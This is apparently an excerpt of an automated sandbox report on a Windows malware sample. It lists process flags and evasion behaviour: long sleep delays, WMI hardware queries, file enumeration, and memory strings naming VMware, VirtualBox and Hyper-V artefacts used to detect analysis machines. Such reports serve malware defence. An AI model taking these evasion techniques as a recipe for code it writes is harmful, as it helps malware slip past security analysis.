Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F324.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\F557.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: Process Memory Space: powershell.exe PID: 5720, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\gfiecjd Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Memory allocated: 1FF71250000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AppLaunch.exe Memory allocated: 1FF72D00000 memory reserve | memory write watch
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488BEAC1C str word ptr [eax-75h] 13_3_00007DF488BEAC1C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2180
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1689
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4485
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5279
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7381
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2423
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 419
Source: C:\Windows\explorer.exe Window / User API: threadDelayed 483
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 855
Source: C:\Windows\SysWOW64\explorer.exe Window / User API: threadDelayed 363
Source: C:\Users\user\AppData\Local\Temp\F557.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5968 Thread sleep count: 2180 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5968 Thread sleep count: 1689 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4952 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6524 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1216 Thread sleep count: 4485 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4832 Thread sleep count: 5279 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4816 Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5584 Thread sleep count: 7381 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5584 Thread sleep count: 2423 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2232 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\explorer.exe TID: 5004 Thread sleep count: 419 > 30
Source: C:\Windows\explorer.exe TID: 6092 Thread sleep count: 483 > 30
Source: C:\Windows\explorer.exe TID: 6092 Thread sleep time: -48300s >= -30000s
Source: C:\Windows\explorer.exe TID: 5832 Thread sleep count: 288 > 30
Source: C:\Windows\explorer.exe TID: 6096 Thread sleep count: 216 > 30
Source: C:\Windows\explorer.exe TID: 5540 Thread sleep count: 191 > 30
Source: C:\Windows\explorer.exe TID: 5584 Thread sleep count: 187 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 6476 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe TID: 6352 Thread sleep time: -930000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe TID: 1628 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe TID: 7060 Thread sleep time: -360000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe TID: 6352 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6760 Thread sleep count: 43 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 6760 Thread sleep time: -43000s >= -30000s
Source: C:\Windows\explorer.exe TID: 4296 Thread sleep count: 40 > 30
Source: C:\Windows\explorer.exe TID: 4296 Thread sleep time: -40000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 2232 Thread sleep count: 363 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 2232 Thread sleep time: -217800000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 2232 Thread sleep time: -600000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 5416 Thread sleep count: 33 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 5416 Thread sleep time: -33000s >= -30000s
Source: C:\Windows\explorer.exe TID: 4404 Thread sleep count: 36 > 30
Source: C:\Windows\explorer.exe TID: 4404 Thread sleep time: -36000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 4120 Thread sleep count: 39 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 4120 Thread sleep time: -39000s >= -30000s
Source: C:\Users\user\Desktop\xwREqjHUEv.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\Desktop\xwREqjHUEv.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\F557.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_00405C63 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405C63
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_00402910 FindFirstFileW, 0_2_00402910
Source: C:\Users\user\Desktop\xwREqjHUEv.exe Code function: 0_2_004068B4 FindFirstFileW,FindClose, 0_2_004068B4
Source: C:\Users\user\AppData\Local\Temp\F557.exe Code function: 24_2_005A14DE FindFirstFileExW, 24_2_005A14DE
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose, 25_2_030A2B15
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose, 25_2_030A3ED9
Source: C:\Windows\SysWOW64\explorer.exe Code function: 25_2_030A1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose, 25_2_030A1D4A
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C08E20 GetLogicalDriveStringsW, 13_3_00007DF488C08E20
Source: C:\Windows\System32\OpenWith.exe Code function: 13_3_00007DF488C67344 GetSystemInfo, 13_3_00007DF488C67344
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\bb8ef99577\Utsysc.exe Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 600000
Source: C:\Windows\SysWOW64\explorer.exe Thread delayed: delay time: 600000
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Adobe
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Adobe\Acrobat
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local
Source: powershell.exe, 00000006.00000002.2139498659.0000000008770000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: VMware
Source: powershell.exe, 00000006.00000002.2117709095.0000000005DFC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2139498659.0000000008770000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: VBoxTray
Source: xwREqjHUEv.exe, 00000000.00000002.2013926877.000000000063D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000002.00000002.2018475832.00000000035D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yJ
Source: dialer.exe, 00000008.00000002.2179502252.0000000003408000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWLevel
Source: dialer.exe, 00000008.00000002.2179356766.0000000003394000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMCIDevSymbol
Source: dialer.exe, 00000008.00000002.2179502252.0000000003408000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000006.00000002.2139498659.0000000008770000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: vmtoolsd
Source: powershell.exe, 00000006.00000002.2139498659.0000000008770000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: VBoxService
Source: wscript.exe, 00000002.00000002.2018475832.00000000035D8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\>
Source: C:\Users\user\Desktop\xwREqjHUEv.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\gfiecjd System information queried: ModuleInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\AppData\Roaming\gfiecjd System information queried: CodeIntegrityInformation
